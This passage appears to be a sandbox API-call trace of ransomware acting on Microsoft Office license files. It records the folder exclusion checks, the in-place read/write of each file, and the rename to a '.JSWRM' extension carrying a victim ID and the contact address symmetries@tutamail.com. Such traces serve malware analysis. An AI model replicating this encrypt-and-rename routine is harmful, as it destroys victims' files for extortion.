MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription2-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription2-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription2-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription2-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0105.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0105.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c000 | out: hHeap=0x1e0000) returned 1 [0105.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.760] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6ea70e0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe6ea70e0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe6f3faed, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d97, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365SmallBusPremR_Subscription2-ul-oob.xrm-ms", cAlternateFileName="O365SM~4.XRM")) returned 1 [0105.760] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription2-ul-oob.xrm-ms", lpString2=".") returned 1 [0105.760] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription2-ul-oob.xrm-ms", lpString2="..") returned 1 [0105.760] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription2-ul-oob.xrm-ms", lpString2="...") returned 1 [0105.760] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription2-ul-oob.xrm-ms", lpString2="windows") returned -1 [0105.760] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription2-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0105.760] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription2-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0105.760] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription2-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0105.760] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription2-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.760] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription2-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0105.760] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription2-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0105.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0105.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription2-ul-oob.xrm-ms", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0105.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription2-ul-oob.xrm-ms", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_Subscription2-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 45 [0105.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0105.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0105.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription2-ul-oob.xrm-ms", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0105.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription2-ul-oob.xrm-ms", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_Subscription2-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 45 [0105.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0105.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0105.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0105.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0105.761] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription2-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription2-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.761] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11671) returned 1 [0105.761] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d90) returned 0x24c1d0 [0105.761] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d90, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d90, lpOverlapped=0x0) returned 1 [0105.764] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.764] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d90, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d90, lpOverlapped=0x0) returned 1 [0105.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.764] CloseHandle (hObject=0x45c) returned 1 [0105.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b830 [0105.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0105.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0105.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0105.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0105.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0105.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0105.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0105.765] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription2-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription2-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription2-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription2-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0105.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b830 | out: hHeap=0x1e0000) returned 1 [0105.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0105.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.766] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6e5ac86, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe6e5ac86, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe6f19863, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bcf, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365SmallBusPremR_Subscription3-pl.xrm-ms", cAlternateFileName="O365SM~3.XRM")) returned 1 [0105.766] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription3-pl.xrm-ms", lpString2=".") returned 1 [0105.766] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription3-pl.xrm-ms", lpString2="..") returned 1 [0105.766] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription3-pl.xrm-ms", lpString2="...") returned 1 [0105.766] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription3-pl.xrm-ms", lpString2="windows") returned -1 [0105.766] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription3-pl.xrm-ms", lpString2="recovery") returned -1 [0105.766] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription3-pl.xrm-ms", lpString2="perflogs") returned -1 [0105.766] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription3-pl.xrm-ms", lpString2="documents and settings") returned 1 [0105.766] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription3-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.766] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription3-pl.xrm-ms", lpString2="system volume information") returned -1 [0105.766] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription3-pl.xrm-ms", lpString2="msocache") returned 1 [0105.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0105.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription3-pl.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0105.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription3-pl.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22cdc8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_Subscription3-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0105.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0105.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0105.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription3-pl.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0105.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0105.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription3-pl.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22ce70, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_Subscription3-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0105.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0105.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0105.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0105.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0105.766] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription3-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription3-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.767] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11215) returned 1 [0105.767] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bc0) returned 0x24c1d0 [0105.768] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bc0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bc0, lpOverlapped=0x0) returned 1 [0105.770] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.771] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bc0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bc0, lpOverlapped=0x0) returned 1 [0105.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.771] CloseHandle (hObject=0x45c) returned 1 [0105.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0105.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0105.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0105.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0105.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0105.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0105.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.771] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription3-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription3-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription3-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription3-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0105.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0105.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0105.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0105.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.772] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7345a77, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7345a77, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe742a8a9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x6c57, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365SmallBusPremR_Subscription3-ppd.xrm-ms", cAlternateFileName="O3126E~1.XRM")) returned 1 [0105.772] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription3-ppd.xrm-ms", lpString2=".") returned 1 [0105.772] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription3-ppd.xrm-ms", lpString2="..") returned 1 [0105.773] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription3-ppd.xrm-ms", lpString2="...") returned 1 [0105.773] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription3-ppd.xrm-ms", lpString2="windows") returned -1 [0105.773] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription3-ppd.xrm-ms", lpString2="recovery") returned -1 [0105.773] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription3-ppd.xrm-ms", lpString2="perflogs") returned -1 [0105.773] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription3-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0105.773] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription3-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.773] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription3-ppd.xrm-ms", lpString2="system volume information") returned -1 [0105.773] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription3-ppd.xrm-ms", lpString2="msocache") returned 1 [0105.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0105.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription3-ppd.xrm-ms", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0105.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription3-ppd.xrm-ms", cchWideChar=42, lpMultiByteStr=0x22d260, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_Subscription3-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 42 [0105.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0105.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0105.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription3-ppd.xrm-ms", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0105.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription3-ppd.xrm-ms", cchWideChar=42, lpMultiByteStr=0x22cdc8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_Subscription3-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 42 [0105.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0105.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0105.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0105.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0105.773] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription3-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription3-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.774] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=27735) returned 1 [0105.774] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6c50) returned 0x24c1d0 [0105.774] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x6c50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x6c50, lpOverlapped=0x0) returned 1 [0105.777] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.777] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x6c50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x6c50, lpOverlapped=0x0) returned 1 [0105.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.778] CloseHandle (hObject=0x45c) returned 1 [0105.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c000 [0105.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, 